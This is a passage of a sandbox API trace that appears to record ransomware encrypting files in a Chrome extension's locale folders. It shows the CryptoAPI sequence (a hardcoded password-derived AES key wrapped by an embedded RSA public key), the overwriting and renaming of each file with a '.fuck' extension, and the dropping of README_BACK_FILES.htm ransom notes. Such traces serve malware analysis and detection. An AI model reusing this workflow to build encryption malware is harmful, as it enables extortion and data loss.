lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.488] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.488] GetLastError () returned 0x0 [0248.488] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json")) returned 0x20 [0248.488] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json", dwFileAttributes=0x80) returned 1 [0248.489] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.489] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.489] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.490] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.492] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.492] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.492] CryptHashData (hHash=0x2938978, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.492] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29387f8) returned 1 [0248.492] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.492] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.492] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293c2d0) returned 1 [0248.492] CryptImportPublicKeyInfo (in: hCryptProv=0x293c2d0, dwCertEncodingType=0x1, pInfo=0x29315b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29315e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29315e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936cb8) returned 1 [0248.493] CryptEncrypt (in: hKey=0x2936cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.493] CryptEncrypt (in: hKey=0x2936cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293c028*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293c028*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.493] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293c028*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293c028*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.494] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x104, lpOverlapped=0x0) returned 1 [0248.495] CryptEncrypt (in: hKey=0x29387f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x104, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0248.495] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0248.495] CloseHandle (hObject=0x5d58) returned 1 [0248.495] CloseHandle (hObject=0x5d5c) returned 1 [0248.495] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json"), bFailIfExists=0) returned 1 [0248.497] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json", dwFileAttributes=0x0) returned 1 [0248.498] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.gsg")) returned 1 [0248.499] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.fuck")) returned 1 [0248.500] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.500] CryptDestroyKey (hKey=0x29387f8) returned 1 [0248.500] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.500] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.500] FindClose (in: hFindFile=0x29389f8 | out: hFindFile=0x29389f8) returned 1 [0248.500] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\readme_back_files.htm")) returned 0xffffffff [0248.500] AreFileApisANSI () returned 1 [0248.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e33b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.500] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.501] GetFileType (hFile=0x5d50) returned 0x1 [0248.501] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.502] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.502] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.502] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.502] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.502] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.502] GetLastError () returned 0x0 [0248.502] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json")) returned 0x20 [0248.503] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json", dwFileAttributes=0x80) returned 1 [0248.503] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.503] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.504] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.505] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.507] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.507] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.507] CryptHashData (hHash=0x2938978, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.507] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29389f8) returned 1 [0248.507] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.508] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.508] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293cf08) returned 1 [0248.508] CryptImportPublicKeyInfo (in: hCryptProv=0x293cf08, dwCertEncodingType=0x1, pInfo=0x2930b20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2930b50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2930b58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936cf8) returned 1 [0248.508] CryptEncrypt (in: hKey=0x2936cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.508] CryptEncrypt (in: hKey=0x2936cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293c138*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293c138*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.508] WriteFile (in: hFile=0x5d58, lpBuffer=0x293c138*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293c138*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.509] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xdd, lpOverlapped=0x0) returned 1 [0248.511] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xdd, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0248.511] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0248.511] CloseHandle (hObject=0x5d5c) returned 1 [0248.511] CloseHandle (hObject=0x5d58) returned 1 [0248.511] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json"), bFailIfExists=0) returned 1 [0248.514] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json", dwFileAttributes=0x0) returned 1 [0248.515] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.gsg")) returned 1 [0248.516] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.fuck")) returned 1 [0248.516] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.516] CryptDestroyKey (hKey=0x29389f8) returned 1 [0248.516] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.517] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.517] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.517] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\readme_back_files.htm")) returned 0xffffffff [0248.517] AreFileApisANSI () returned 1 [0248.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.517] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.519] GetFileType (hFile=0x5d50) returned 0x1 [0248.519] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.520] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.520] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.544] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.544] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.544] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.545] GetLastError () returned 0x0 [0248.545] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json")) returned 0x20 [0248.545] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json", dwFileAttributes=0x80) returned 1 [0248.546] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.546] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.547] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.547] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.550] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.550] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.550] CryptHashData (hHash=0x2938978, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.550] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.550] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.550] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.550] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, 